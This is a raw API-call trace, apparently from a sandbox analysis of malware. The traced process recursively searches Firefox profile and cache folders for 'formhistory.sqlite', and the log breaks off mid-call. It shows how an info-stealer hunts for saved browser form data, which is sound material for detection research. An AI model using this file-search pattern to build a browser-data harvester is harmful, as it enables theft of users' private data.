1 [0591.118] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.118] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 0 [0591.118] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.118] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.118] LocalFree (hMem=0x2ee0448) returned 0x0 [0591.118] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.118] lstrcmpiW (lpString1="toFetch", lpString2=".") returned 1 [0591.118] lstrcmpiW (lpString1="toFetch", lpString2="..") returned 1 [0591.118] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0591.118] lstrlenW (lpString="\\") returned 1 [0591.118] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0591.118] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc490 [0591.118] lstrlenW (lpString="toFetch") returned 7 [0591.118] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0591.118] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2ee0448 [0591.118] LocalFree (hMem=0x2edc490) returned 0x0 [0591.118] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0591.118] lstrlenW (lpString="\\*.*") returned 4 [0591.118] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0591.118] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee0590 [0591.118] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*.*", lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 0x5b9b10 [0591.119] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.119] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 1 [0591.119] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.119] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.119] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 0 [0591.119] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.119] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.119] LocalFree (hMem=0x2ee0448) returned 0x0 [0591.119] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 0 [0591.119] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.119] LocalFree (hMem=0x2edc358) returned 0x0 [0591.119] LocalFree (hMem=0x2edc220) returned 0x0 [0591.119] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.119] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0591.119] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0591.119] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.119] lstrlenW (lpString="\\") returned 1 [0591.119] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.119] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.119] lstrlenW (lpString="webapps") returned 7 [0591.119] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.119] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x2edc220 [0591.119] LocalFree (hMem=0x63eca8) returned 0x0 [0591.119] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0591.119] lstrlenW (lpString="\\*.*") returned 4 [0591.119] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0591.119] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x2edc358 [0591.119] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*.*", lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 0x5b9b50 [0591.119] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.119] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.119] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.119] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.119] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.119] lstrlenW (lpString="\\") returned 1 [0591.119] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0591.119] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc490 [0591.119] lstrlenW (lpString="webapps.json") returned 12 [0591.119] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\") returned 84 [0591.119] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x2edede0 [0591.119] LocalFree (hMem=0x2edc490) returned 0x0 [0591.119] StrStrIW (lpFirst="webapps.json", lpSrch="formhistory.sqlite") returned 0x0 [0591.119] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 0 [0591.119] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.120] LocalFree (hMem=0x2edc358) returned 0x0 [0591.120] LocalFree (hMem=0x2edc220) returned 0x0 [0591.120] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.120] lstrlenW (lpString="\\") returned 1 [0591.120] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.120] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.120] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0591.120] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.120] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x2ee0448 [0591.120] LocalFree (hMem=0x63eca8) returned 0x0 [0591.120] StrStrIW (lpFirst="webappsstore.sqlite", lpSrch="formhistory.sqlite") returned 0x0 [0591.120] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 0 [0591.120] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.120] LocalFree (hMem=0x63eb80) returned 0x0 [0591.120] LocalFree (hMem=0x63ea58) returned 0x0 [0591.120] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de38 | out: lpFindFileData=0x52de38) returned 0 [0591.120] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0591.120] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.120] LocalFree (hMem=0x5e3098) returned 0x0 [0591.120] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e0b4 | out: lpFindFileData=0x52e0b4) returned 1 [0591.120] lstrlenW (lpString="\\") returned 1 [0591.120] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned 49 [0591.120] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2060 [0591.120] lstrlenW (lpString="profiles.ini") returned 12 [0591.120] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0591.120] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x63f8c8 [0591.120] LocalFree (hMem=0x2ed2060) returned 0x0 [0591.120] StrStrIW (lpFirst="profiles.ini", lpSrch="formhistory.sqlite") returned 0x0 [0591.120] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e0b4 | out: lpFindFileData=0x52e0b4) returned 0 [0591.120] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0591.120] LocalFree (hMem=0x5e6f98) returned 0x0 [0591.120] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0591.120] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x5eb208 [0591.120] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x5eb208 | out: pszPath="C:\\ProgramData") returned 0x0 [0591.120] lstrlenW (lpString="\\Mozilla\\Firefox") returned 16 [0591.120] lstrlenW (lpString="C:\\ProgramData") returned 14 [0591.120] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0x5b7378 [0591.120] LocalFree (hMem=0x5eb208) returned 0x0 [0591.120] lstrlenW (lpString="C:\\ProgramData\\Mozilla\\Firefox") returned 30 [0591.120] lstrlenW (lpString="\\*.*") returned 4 [0591.120] lstrlenW (lpString="C:\\ProgramData\\Mozilla\\Firefox") returned 30 [0591.120] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0x5d5258 [0591.120] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Mozilla\\Firefox\\*.*", lpFindFileData=0x52e0a0 | out: lpFindFileData=0x52e0a0) returned 0xffffffff [0591.121] LocalFree (hMem=0x5d5258) returned 0x0 [0591.121] LocalFree (hMem=0x5b7378) returned 0x0 [0591.121] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x5eb208 [0591.121] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5eb208 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0591.121] lstrlenW (lpString="\\Mozilla\\Firefox") returned 16 [0591.121] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.121] LocalAlloc (uFlags=0x40, uBytes=0xe0) returned 0x2ed0060 [0591.121] LocalFree (hMem=0x5eb208) returned 0x0 [0591.121] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox") returned 47 [0591.121] lstrlenW (lpString="\\*.*") returned 4 [0591.121] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox") returned 47 [0591.121] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed2ab0 [0591.121] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\*.*", lpFindFileData=0x52e08c | out: lpFindFileData=0x52e08c) returned 0x57d1e0 [0591.122] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.122] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e08c | out: lpFindFileData=0x52e08c) returned 1 [0591.122] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.122] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.122] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e08c | out: lpFindFileData=0x52e08c) returned 1 [0591.122] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0591.122] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0591.122] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox") returned 47 [0591.122] lstrlenW (lpString="\\") returned 1 [0591.122] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox") returned 47 [0591.122] LocalAlloc (uFlags=0x40, uBytes=0xe2) returned 0x2ed2060 [0591.122] lstrlenW (lpString="Profiles") returned 8 [0591.122] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\") returned 48 [0591.122] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e3098 [0591.122] LocalFree (hMem=0x2ed2060) returned 0x0 [0591.122] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 56 [0591.122] lstrlenW (lpString="\\*.*") returned 4 [0591.122] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 56 [0591.122] LocalAlloc (uFlags=0x40, uBytes=0xfa) returned 0x5d7c90 [0591.122] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 0x57ca60 [0591.122] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.122] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0591.122] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.122] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.122] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0591.122] lstrcmpiW (lpString1="3y2joh8o.default", lpString2=".") returned 1 [0591.122] lstrcmpiW (lpString1="3y2joh8o.default", lpString2="..") returned 1 [0591.122] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 56 [0591.122] lstrlenW (lpString="\\") returned 1 [0591.122] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 56 [0591.122] LocalAlloc (uFlags=0x40, uBytes=0xf4) returned 0x5e3198 [0591.122] lstrlenW (lpString="3y2joh8o.default") returned 16 [0591.122] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\") returned 57 [0591.122] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x63ea58 [0591.122] LocalFree (hMem=0x5e3198) returned 0x0 [0591.122] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 73 [0591.122] lstrlenW (lpString="\\*.*") returned 4 [0591.122] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 73 [0591.122] LocalAlloc (uFlags=0x40, uBytes=0x11c) returned 0x63eb80 [0591.122] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*.*", lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0x57c9a0 [0591.123] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.123] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0591.123] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.123] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.123] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0591.123] lstrcmpiW (lpString1="Cache", lpString2=".") returned 1 [0591.123] lstrcmpiW (lpString1="Cache", lpString2="..") returned 1 [0591.124] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 73 [0591.124] lstrlenW (lpString="\\") returned 1 [0591.124] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 73 [0591.124] LocalAlloc (uFlags=0x40, uBytes=0x116) returned 0x63eca8 [0591.124] lstrlenW (lpString="Cache") returned 5 [0591.124] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 74 [0591.124] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63edd0 [0591.124] LocalFree (hMem=0x63eca8) returned 0x0 [0591.124] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.124] lstrlenW (lpString="\\*.*") returned 4 [0591.124] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.124] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x2edc220 [0591.124] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\*.*", lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0x5b9b50 [0591.125] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.125] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.125] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.125] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.125] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.125] lstrcmpiW (lpString1="0", lpString2=".") returned 1 [0591.125] lstrcmpiW (lpString1="0", lpString2="..") returned 1 [0591.125] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.125] lstrlenW (lpString="\\") returned 1 [0591.125] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.125] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x2edc358 [0591.125] lstrlenW (lpString="0") returned 1 [0591.125] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\") returned 80 [0591.125] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x2edc490 [0591.125] LocalFree (hMem=0x2edc358) returned 0x0 [0591.125] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0") returned 81 [0591.125] lstrlenW (lpString="\\*.*") returned 4 [0591.125] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0") returned 81 [0591.125] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc358 [0591.125] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.126] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.126] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.126] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.126] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.126] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.126] lstrcmpiW (lpString1="98", lpString2=".") returned 1 [0591.126] lstrcmpiW (lpString1="98", lpString2="..") returned 1 [0591.126] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0") returned 81 [0591.126] lstrlenW (lpString="\\") returned 1 [0591.126] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0") returned 81 [0591.126] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.126] lstrlenW (lpString="98") returned 2 [0591.126] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\") returned 82 [0591.126] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.126] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.126] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\98") returned 84 [0591.126] lstrlenW (lpString="\\*.*") returned 4 [0591.126] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\98") returned 84 [0591.126] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.126] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\98\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.126] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.126] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.126] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.126] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.126] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.126] lstrlenW (lpString="\\") returned 1 [0591.126] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\98") returned 84 [0591.126] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.126] lstrlenW (lpString="B60F3d01") returned 8 [0591.126] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\98\\") returned 85 [0591.126] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee06d8 [0591.126] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.126] StrStrIW (lpFirst="B60F3d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.126] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.126] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.126] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.126] LocalFree (hMem=0x2edc700) returned 0x0 [0591.126] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.126] lstrcmpiW (lpString1="A8", lpString2=".") returned 1 [0591.126] lstrcmpiW (lpString1="A8", lpString2="..") returned 1 [0591.126] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0") returned 81 [0591.127] lstrlenW (lpString="\\") returned 1 [0591.127] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0") returned 81 [0591.127] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.127] lstrlenW (lpString="A8") returned 2 [0591.127] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\") returned 82 [0591.127] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.127] LocalFree (hMem=0x2edc700) returned 0x0 [0591.127] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\A8") returned 84 [0591.127] lstrlenW (lpString="\\*.*") returned 4 [0591.127] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\A8") returned 84 [0591.127] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.127] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\A8\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.127] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.127] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.127] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.127] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.127] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.127] lstrlenW (lpString="\\") returned 1 [0591.127] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\A8") returned 84 [0591.127] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc700 [0591.127] lstrlenW (lpString="C3B7Bd01") returned 8 [0591.127] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\A8\\") returned 85 [0591.127] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee0820 [0591.127] LocalFree (hMem=0x2edc700) returned 0x0 [0591.127] StrStrIW (lpFirst="C3B7Bd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.127] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.127] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.127] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.127] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.127] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.127] lstrcmpiW (lpString1="CB", lpString2=".") returned 1 [0591.127] lstrcmpiW (lpString1="CB", lpString2="..") returned 1 [0591.127] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0") returned 81 [0591.127] lstrlenW (lpString="\\") returned 1 [0591.127] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0") returned 81 [0591.127] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.127] lstrlenW (lpString="CB") returned 2 [0591.127] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\") returned 82 [0591.127] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.127] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.128] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\CB") returned 84 [0591.128] lstrlenW (lpString="\\*.*") returned 4 [0591.128] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\CB") returned 84 [0591.128] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.128] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\CB\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.128] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.128] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.128] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.128] lstrcmpiW (lpString1="..", lpString2="..") returned 